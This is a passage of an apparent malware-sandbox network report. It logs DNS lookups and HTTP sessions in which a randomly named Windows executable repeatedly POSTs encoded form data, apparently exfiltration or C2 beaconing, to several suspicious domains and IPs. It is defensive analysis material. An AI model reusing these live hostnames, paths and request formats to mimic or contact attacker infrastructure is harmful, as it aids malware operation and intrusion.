                                                          Nov 5, 2024 15:44:33.583451033 CET8050032184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:33.583462954 CET8050032184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:33.583498955 CET5003280192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:33.583513975 CET5003280192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:33.588130951 CET8050032184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:33.588144064 CET8050032184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:33.588155031 CET8050032184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:33.588268042 CET5003280192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:33.622761965 CET8050032184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:33.622838974 CET5003280192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:34.405389071 CET5003280192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:35.422719955 CET5003380192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:35.692040920 CET8050033184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:35.696904898 CET5003380192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:35.709397078 CET5003380192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:35.714323997 CET8050033184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:36.379184961 CET8050033184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:36.379194975 CET8050033184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:36.379301071 CET8050033184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:36.379324913 CET8050033184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:36.379331112 CET8050033184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:36.379436970 CET8050033184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:36.379437923 CET5003380192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:36.379437923 CET5003380192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:36.380254030 CET8050033184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:36.380422115 CET8050033184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:36.380429983 CET8050033184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:36.380434990 CET8050033184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:36.380501986 CET5003380192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:36.380501986 CET5003380192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:36.386878967 CET8050033184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:36.386887074 CET8050033184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:36.387031078 CET8050033184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:36.387036085 CET8050033184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:36.387140036 CET5003380192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:36.418535948 CET8050033184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:36.419490099 CET5003380192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:37.215569973 CET5003380192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:38.239382029 CET5003480192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:38.244446039 CET8050034184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:38.248131037 CET5003480192.168.2.4184.94.215.26
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 5, 2024 15:42:21.011184931 CET | 192.168.2.4 | 1.1.1.1 | 0xf3c8 | Standard query (0) | www.it2sp8.vip | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:42:39.813759089 CET | 192.168.2.4 | 1.1.1.1 | 0x5a9f | Standard query (0) | www.bandukchi.com | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:42:53.282466888 CET | 192.168.2.4 | 1.1.1.1 | 0x62cb | Standard query (0) | www.onlineblikje.online | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:43:08.344566107 CET | 192.168.2.4 | 1.1.1.1 | 0x3ac2 | Standard query (0) | www.ninesquare.games | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:43:36.954783916 CET | 192.168.2.4 | 1.1.1.1 | 0x7924 | Standard query (0) | www.s9gzg9.vip | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:43:50.266617060 CET | 192.168.2.4 | 1.1.1.1 | 0xbcac | Standard query (0) | www.030002832.xyz | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:44:03.953660011 CET | 192.168.2.4 | 1.1.1.1 | 0x7fd3 | Standard query (0) | www.meliorahomes.net | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:44:18.063508987 CET | 192.168.2.4 | 1.1.1.1 | 0xd817 | Standard query (0) | www.bdipjg.asia | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:44:32.454004049 CET | 192.168.2.4 | 1.1.1.1 | 0x34bf | Standard query (0) | www.sortcy.top | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:44:46.595453978 CET | 192.168.2.4 | 1.1.1.1 | 0xbd1b | Standard query (0) | www.bearableguy.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 5, 2024 15:42:21.023955107 CET | 1.1.1.1 | 192.168.2.4 | 0xf3c8 | No error (0) | www.it2sp8.vip | it2sp8.vip | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 5, 2024 15:42:21.023955107 CET | 1.1.1.1 | 192.168.2.4 | 0xf3c8 | No error (0) | it2sp8.vip | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:42:21.023955107 CET | 1.1.1.1 | 192.168.2.4 | 0xf3c8 | No error (0) | it2sp8.vip | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:42:39.849195957 CET | 1.1.1.1 | 192.168.2.4 | 0x5a9f | No error (0) | www.bandukchi.com | bandukchi.com | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 5, 2024 15:42:39.849195957 CET | 1.1.1.1 | 192.168.2.4 | 0x5a9f | No error (0) | bandukchi.com | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:42:39.849195957 CET | 1.1.1.1 | 192.168.2.4 | 0x5a9f | No error (0) | bandukchi.com | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:42:53.342533112 CET | 1.1.1.1 | 192.168.2.4 | 0x62cb | No error (0) | www.onlineblikje.online | - | 213.249.67.10 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:43:08.440668106 CET | 1.1.1.1 | 192.168.2.4 | 0x3ac2 | No error (0) | www.ninesquare.games | ninesquare.games | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 5, 2024 15:43:08.440668106 CET | 1.1.1.1 | 192.168.2.4 | 0x3ac2 | No error (0) | ninesquare.games | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:43:08.440668106 CET | 1.1.1.1 | 192.168.2.4 | 0x3ac2 | No error (0) | ninesquare.games | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:43:36.966566086 CET | 1.1.1.1 | 192.168.2.4 | 0x7924 | No error (0) | www.s9gzg9.vip | s9gzg9.vip | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 5, 2024 15:43:36.966566086 CET | 1.1.1.1 | 192.168.2.4 | 0x7924 | No error (0) | s9gzg9.vip | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:43:36.966566086 CET | 1.1.1.1 | 192.168.2.4 | 0x7924 | No error (0) | s9gzg9.vip | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:43:50.313757896 CET | 1.1.1.1 | 192.168.2.4 | 0xbcac | No error (0) | www.030002832.xyz | - | 161.97.142.144 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:44:03.967772007 CET | 1.1.1.1 | 192.168.2.4 | 0x7fd3 | No error (0) | www.meliorahomes.net | - | 8.217.17.192 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:44:18.882421017 CET | 1.1.1.1 | 192.168.2.4 | 0xd817 | No error (0) | www.bdipjg.asia | - | 78.141.202.204 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:44:32.868058920 CET | 1.1.1.1 | 192.168.2.4 | 0x34bf | No error (0) | www.sortcy.top | - | 184.94.215.26 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:44:47.409607887 CET | 1.1.1.1 | 192.168.2.4 | 0xbd1b | No error (0) | www.bearableguy.net | bearableguy.net | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 5, 2024 15:44:47.409607887 CET | 1.1.1.1 | 192.168.2.4 | 0xbd1b | No error (0) | bearableguy.net | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:44:47.409607887 CET | 1.1.1.1 | 192.168.2.4 | 0xbd1b | No error (0) | bearableguy.net | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 3.33.130.190 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:42:21.044989109 CET | 445 | OUT | GET /r1bk/?H0kxIVc=yDxWd0BQEE2xW+d30AjHvTjkfNCptZ8W4Q8iivRSkmBvD/jrOo7hTp1c5kyDuCDLc7U+VDeOvWVRbtchKio2461hrTCe68AibWCqyGiIKQvuKq+py71Z7uY=&Ot=J0UP4Hshc HTTP/1.1
                                                          Host: www.it2sp8.vip
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
Nov 5, 2024 15:42:24.712698936 CET | 396 | IN | HTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Tue, 05 Nov 2024 14:42:24 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 256
                                                          Connection: close
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?H0kxIVc=yDxWd0BQEE2xW+d30AjHvTjkfNCptZ8W4Q8iivRSkmBvD/jrOo7hTp1c5kyDuCDLc7U+VDeOvWVRbtchKio2461hrTCe68AibWCqyGiIKQvuKq+py71Z7uY=&Ot=J0UP4Hshc"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 3.33.130.190 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:42:39.994965076 CET | 718 | OUT | POST /5lco/ HTTP/1.1
                                                          Host: www.bandukchi.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.bandukchi.com
                                                          Referer: http://www.bandukchi.com/5lco/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 204
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Ascii: H0kxIVc=Pt++kAhBCTpQyveFcKiyW8f610b0oqdMkZnUYun+cuWkyyXZ7R9vbcD9furN+p9xADthCyG34F2BLoAziiJ4Qp35nBgVT5MG+8S68GKDLyW03lj43wrM+R1evk8QG6DL3d6Aa7v6+jJQ5ISozdv8zYWwFta/LiKDkaotL0OC8UvBrtRQHvNn6MaHfXetefW25Q==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49738 | 3.33.130.190 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:42:42.547991991 CET | 738 | OUT | POST /5lco/ HTTP/1.1
                                                          Host: www.bandukchi.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.bandukchi.com
                                                          Referer: http://www.bandukchi.com/5lco/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 224
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Ascii: H0kxIVc=Pt++kAhBCTpQwPOFQJ6yQcf96Ub0+adIkZ7UYrWjfcCkyTnZ6UdvYcD9L+rMh59uADRpC3m34FiBLsMziTJ/R537+RgbcZMG+8S68CilLye02W74xRrPhh1dok8QC6DQ3d7na/uV+gxQ5MaozMv/g4WyBtarDWTKtpVFWCScjVjAurAKWeswoM+0CQXZTcr/iQMpryegpQAYDc6jPGu8Er8=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49739 | 3.33.130.190 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:42:45.096685886 CET | 10820 | OUT | POST /5lco/ HTTP/1.1
                                                          Host: www.bandukchi.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.bandukchi.com
                                                          Referer: http://www.bandukchi.com/5lco/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 10304
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
Data Ascii: H0kxIVc= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49742 | 3.33.130.190 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:42:47.645574093 CET | 448 | OUT | GET /5lco/?H0kxIVc=CvWen2QyFQx61qXZcJ6WaNLV8x6X7ZVzg6r8Qqi7af+RkACh3mo/Ys7mcuj5lMFPExxzGnawwjipItEZ43N8KIbGnzAFfsAX8PL843K3MC6R2n7AiDX71Bw=&Ot=J0UP4Hshc HTTP/1.1
                                                          Host: www.bandukchi.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
Nov 5, 2024 15:42:48.264712095 CET | 396 | IN | HTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Tue, 05 Nov 2024 14:42:48 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 256
                                                          Connection: close
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?H0kxIVc=CvWen2QyFQx61qXZcJ6WaNLV8x6X7ZVzg6r8Qqi7af+RkACh3mo/Ys7mcuj5lMFPExxzGnawwjipItEZ43N8KIbGnzAFfsAX8PL843K3MC6R2n7AiDX71Bw=&Ot=J0UP4Hshc"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49772 | 213.249.67.10 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:42:53.362118959 CET | 736 | OUT | POST /qmow/ HTTP/1.1
                                                          Host: www.onlineblikje.online
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.onlineblikje.online
                                                          Referer: http://www.onlineblikje.online/qmow/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 204
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 71 59 63 71 42 71 76 63 77 47 57 54 43 68 76 5a 54 66 4b 6b 55 37 79 6c 63 44 54 6f 68 51 64 61 67 6b 47 38 72 62 36 57 51 35 77 44 4e 48 71 67 56 53 53 79 4a 54 68 70 36 6c 78 77 4c 77 41 58 32 50 77 46 41 7a 6a 75 43 65 74 32 6d 6c 55 39 59 45 52 2b 31 43 32 78 63 72 57 31 76 38 38 66 47 7a 67 6a 32 77 67 59 59 65 38 55 56 4a 4c 35 71 47 47 62 62 6a 6d 2b 6f 74 53 4b 61 6c 6d 46 4a 67 6a 74 2f 2f 47 69 36 55 64 78 74 56 31 31 6b 68 61 46 34 4e 57 6b 41 69 48 6f 65 71 4b 73 42 59 48 69 6c 42 4e 7a 56 51 6b 58 44 66 54 50 72 63 6c 30 38 67 56 57 62 4c 73 59 46 36 71 30 67 77 3d 3d
                                                          Data Ascii: H0kxIVc=qYcqBqvcwGWTChvZTfKkU7ylcDTohQdagkG8rb6WQ5wDNHqgVSSyJThp6lxwLwAX2PwFAzjuCet2mlU9YER+1C2xcrW1v88fGzgj2wgYYe8UVJL5qGGbbjm+otSKalmFJgjt//Gi6UdxtV11khaF4NWkAiHoeqKsBYHilBNzVQkXDfTPrcl08gVWbLsYF6q0gw==
Nov 5, 2024 15:42:54.203351974 CET | 206 | IN | HTTP/1.1 302 Found
                                                          Date: Tue, 05 Nov 2024 14:42:54 GMT
                                                          Server: Apache/2.4.56 (Debian)
                                                          Location: https://onlineblikjes.nl/
                                                          Content-Length: 0
                                                          Connection: close
                                                          Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49783 | 213.249.67.10 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:42:56.219734907 CET | 756 | OUT | POST /qmow/ HTTP/1.1
                                                          Host: www.onlineblikje.online
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.onlineblikje.online
                                                          Referer: http://www.onlineblikje.online/qmow/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 224
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 71 59 63 71 42 71 76 63 77 47 57 54 59 42 7a 5a 52 38 79 6b 46 72 79 71 5a 44 54 6f 76 77 64 65 67 6c 36 38 72 5a 57 47 51 4c 6b 44 4e 6e 36 67 55 54 53 79 5a 44 68 70 79 46 78 31 57 67 41 69 32 50 39 6c 41 79 76 75 43 59 42 32 6d 67 6f 39 5a 33 70 35 7a 53 32 7a 46 62 57 33 77 4d 38 66 47 7a 67 6a 32 78 45 69 59 65 55 55 56 39 50 35 6c 48 47 61 46 54 6d 39 69 4e 53 4b 65 6c 6d 42 4a 67 6a 66 2f 39 79 49 36 52 42 78 74 55 46 31 6c 7a 79 43 78 4e 57 6d 64 79 47 2b 53 35 54 56 44 70 4f 66 6b 7a 74 48 65 69 34 50 50 35 43 56 36 74 45 6a 75 67 78 6c 47 4d 6c 73 49 35 58 39 37 35 41 38 42 4f 7a 37 5a 41 34 6d 79 30 63 6b 38 6a 56 42 79 41 73 3d
                                                          Data Ascii: H0kxIVc=qYcqBqvcwGWTYBzZR8ykFryqZDTovwdegl68rZWGQLkDNn6gUTSyZDhpyFx1WgAi2P9lAyvuCYB2mgo9Z3p5zS2zFbW3wM8fGzgj2xEiYeUUV9P5lHGaFTm9iNSKelmBJgjf/9yI6RBxtUF1lzyCxNWmdyG+S5TVDpOfkztHei4PP5CV6tEjugxlGMlsI5X975A8BOz7ZA4my0ck8jVByAs=
Nov 5, 2024 15:42:57.095061064 CET | 206 | IN | HTTP/1.1 302 Found
                                                          Date: Tue, 05 Nov 2024 14:42:56 GMT
                                                          Server: Apache/2.4.56 (Debian)
                                                          Location: https://onlineblikjes.nl/
                                                          Content-Length: 0
                                                          Connection: close
                                                          Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49798 | 213.249.67.10 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:42:58.768121958 CET | 10838 | OUT | POST /qmow/ HTTP/1.1
                                                          Host: www.onlineblikje.online
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.onlineblikje.online
                                                          Referer: http://www.onlineblikje.online/qmow/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 10304
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 71 59 63 71 42 71 76 63 77 47 57 54 59 42 7a 5a 52 38 79 6b 46 72 79 71 5a 44 54 6f 76 77 64 65 67 6c 36 38 72 5a 57 47 51 4c 38 44 4f 55 69 67 56 77 71 79 61 44 68 70 34 6c 78 30 57 67 41 2f 32 50 56 70 41 79 7a 59 43 62 31 32 6b 46 6b 39 4a 57 70 35 39 53 32 7a 59 72 57 30 76 38 38 77 47 7a 78 72 32 77 30 69 59 65 55 55 56 38 2f 35 68 57 47 61 48 54 6d 2b 6f 74 53 38 61 6c 6d 70 4a 6a 54 6c 2f 39 32 79 37 69 5a 78 74 30 56 31 6d 41 61 43 73 39 57 67 63 79 47 32 53 35 76 30 44 74 6e 7a 6b 33 6b 53 65 67 6b 50 4d 74 2f 4e 68 2f 4e 2f 39 43 5a 68 5a 65 70 4b 50 5a 58 36 69 61 77 77 47 62 72 4f 4f 79 45 55 70 57 68 66 73 42 4a 56 78 6e 61 70 33 37 63 4a 6e 74 45 31 69 42 50 34 5a 2b 67 47 46 42 44 62 45 48 4e 52 4c 79 30 69 54 61 53 30 35 72 42 49 54 32 6a 4f 56 77 77 33 4e 70 49 4e 6f 34 46 57 46 37 5a 45 53 45 38 32 79 37 4a 51 34 39 55 4c 42 70 34 36 6e 6f 4f 58 39 2f 65 31 56 48 6c 6a 43 38 61 7a 54 39 72 76 58 37 6b 65 2f 66 32 44 47 63 6c 33 4e 67 76 39 49 42 73 42 47 33 [TRUNCATED]
                                                          Data Ascii: H0kxIVc=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 [TRUNCATED]
Nov 5, 2024 15:42:59.606549978 CET | 206 | IN | HTTP/1.1 302 Found
                                                          Date: Tue, 05 Nov 2024 14:42:59 GMT
                                                          Server: Apache/2.4.56 (Debian)
                                                          Location: https://onlineblikjes.nl/
                                                          Content-Length: 0
                                                          Connection: close
                                                          Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49814 | 213.249.67.10 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:43:01.405841112 CET | 454 | OUT | GET /qmow/?H0kxIVc=na0KCebXsUeEcQbjI8C3RJS2SBGfuD1cmXaEpqyofp4hZXm4YCiWGFly0HVDOhs56sJdVgPDJehM8FklOw5CghWrF+7Yka4QOwdp8ykVOcUPZunN9V/VPgg=&Ot=J0UP4Hshc HTTP/1.1
                                                          Host: www.onlineblikje.online
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
Nov 5, 2024 15:43:03.202363968 CET | 348 | IN | HTTP/1.1 302 Found
                                                          Date: Tue, 05 Nov 2024 14:43:03 GMT
                                                          Server: Apache/2.4.56 (Debian)
                                                          Location: https://onlineblikjes.nl/?H0kxIVc=na0KCebXsUeEcQbjI8C3RJS2SBGfuD1cmXaEpqyofp4hZXm4YCiWGFly0HVDOhs56sJdVgPDJehM8FklOw5CghWrF+7Yka4QOwdp8ykVOcUPZunN9V/VPgg=&Ot=J0UP4Hshc
                                                          Content-Length: 0
                                                          Connection: close
                                                          Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49854 | 3.33.130.190 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:43:08.459558964 CET | 727 | OUT | POST /4oy8/ HTTP/1.1
                                                          Host: www.ninesquare.games
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.ninesquare.games
                                                          Referer: http://www.ninesquare.games/4oy8/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 204
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 54 4c 4f 68 41 43 33 45 6a 4a 4e 50 43 69 53 66 48 6f 75 39 65 77 73 37 66 68 53 61 61 50 61 57 73 42 66 56 47 59 6d 4b 2b 41 44 77 36 4c 69 6a 70 47 7a 64 78 70 58 61 72 76 54 55 4c 51 4f 52 2b 34 48 6f 2b 4d 73 48 35 78 35 75 38 52 79 79 64 35 51 71 6c 49 57 38 59 72 4f 46 41 36 58 4f 37 38 6b 39 58 64 6e 6e 63 62 43 65 4c 63 76 52 2b 6e 74 6f 64 41 51 62 4c 53 54 68 68 38 64 6d 65 79 56 4d 36 75 37 48 49 45 77 73 58 2b 65 51 51 6c 66 6f 62 31 66 72 69 63 79 64 4e 53 32 4e 46 59 71 57 31 6a 67 59 76 75 37 61 69 31 68 52 41 57 42 6f 6e 79 59 79 6d 6f 4a 61 74 74 6f 75 35 41 3d 3d
                                                          Data Ascii: H0kxIVc=TLOhAC3EjJNPCiSfHou9ews7fhSaaPaWsBfVGYmK+ADw6LijpGzdxpXarvTULQOR+4Ho+MsH5x5u8Ryyd5QqlIW8YrOFA6XO78k9XdnncbCeLcvR+ntodAQbLSThh8dmeyVM6u7HIEwsX+eQQlfob1fricydNS2NFYqW1jgYvu7ai1hRAWBonyYymoJattou5A==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49870 | 3.33.130.190 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:43:11.007330894 CET | 747 | OUT | POST /4oy8/ HTTP/1.1
                                                          Host: www.ninesquare.games
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
